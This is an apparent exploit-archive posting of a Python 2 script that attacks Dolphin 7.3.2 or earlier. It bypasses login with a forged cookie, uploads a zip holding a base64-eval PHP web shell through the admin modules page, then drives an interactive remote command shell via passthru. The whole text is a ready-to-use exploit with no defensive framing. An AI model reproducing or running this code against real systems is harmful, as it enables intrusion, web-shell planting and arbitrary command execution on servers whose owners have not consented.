Dolphin 7.3.2 Authentication Bypass / Remote Command Execution
Posted on 14 November 2016
#!/usr/bin/env python # -*- coding: utf-8 -*- ''' Software : Dolphin <= 7.3.2 Auth bypass / RCE exploit Vendor : www.boonex.com Author : Ahmed sultan (0x4148) Home : 0x4148.com | https://www.linkedin.com/in/0x4148 Email : 0x4148@gmail.com Auth bypass trick credit go to Saadat Ullah ''' import os import sys import urllib import urllib2 import ssl import base64 print "[+] Dolphin <= 7.3.2 Auth bypass / RCE exploit" print "[+] Author : Ahmed sultan (0x4148)" print "[+] Home : 0x4148.com " if len(sys.argv)<2: print " Usage : python "+sys.argv[0]+" http://HOST/path/ " sys.exit(); hosturl=sys.argv[1] fields = {'csrf_token': 'Aint give a shit about csrf stuff ;)', 'submit_upload': '0x4148'} gcontext = ssl.SSLContext(ssl.PROTOCOL_TLSv1) def generate_http_request(fields): lmt = '---------------------------' crlf = ' ' x4148mltprt = [] x4148mltprt.append('--' + lmt) if fields: for (key, value) in fields.items(): x4148mltprt.append('Content-Disposition: form-data; name="%s"' % key) x4148mltprt.append('') x4148mltprt.append(value) x4148mltprt.append('--' + lmt) x4148mltprt.append('Content-Disposition: form-data; name="module"; filename="0x4148.zip"') x4148mltprt.append('Content-Type: application/zip') x4148mltprt.append('') x4148mltprt.append("PKx03x04x0ax00x00x00x00x00RanIjxf0xfdU1x00x00x001x00x00x00x0cx00x00x000x4148fo.php" "<?phpx0dx0aeval(base64_decode($_POST['0x4148']));x0dx0a?>PKx01x02x14x00x0ax00x00x00x00x00RanIj" "xf0xfdU1x00x00x001x00x00x00x0cx00x00x00x00x00x00x00x01x00 x00x00x00x00x00x00x000x4148fo.php" "PKx05x06x00x00x00x00x01x00x01x00:x00x00x00[x00x00x00x00x00") x4148mltprt.append('--' + lmt + '--') x4148mltprt.append('') body = crlf.join(x4148mltprt) content_type = 'multipart/form-data; boundary=%s' % (lmt) return content_type, body content_type, body = generate_http_request(fields) print " + Sending payload to "+hosturl.split("//")[1].split("/")[0] req = urllib2.Request(hosturl+"/administration/modules.php",body) req.add_header('User-agent', 'Mozilla 15') req.add_header("Cookie", "memberID=1; memberPassword[]=0x4148;") req.add_header('Referer', hosturl+"/administration/modules.php") req.add_header('Content-Type', content_type) req.add_header('Content-Length', str(len(body))) req.add_header('Accept', 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8') try: urllib2.urlopen(req,context=gcontext).read() except urllib2.HTTPError, e: err=e.fp.read() print err sys.exit() print " * Checking if payload was send" data = urllib.urlencode({'0x4148':'echo "0x4148foooo";'.encode('base64')}) req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data) if urllib2.urlopen(req).read().find("0x4148foooo")==-1: print " - Exploitation failed" print req sys.exit() print " + php prompt up and running + type 'shell' to get shell access" while True: request=str(raw_input(" php>> ")) if request=="exit": sys.exit() if request=="shell" or request=="cmd": print " + Switched to Shell mode + Type 'return' to return to php prompt mode" while True: cmd=str(raw_input(" 0x4148@"+hosturl.split("//")[1].split("/")[0]+"# ")) if cmd=="return": break if cmd=="exit": sys.exit() kkk="passthru('"+cmd+"');" data = urllib.urlencode({'0x4148':kkk.encode('base64')}) req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data) print urllib2.urlopen(req).read() data = urllib.urlencode({'0x4148':request.encode('base64')}) req = urllib2.Request(hosturl+'/tmp/0x4148fo.php', data) print urllib2.urlopen(req).read()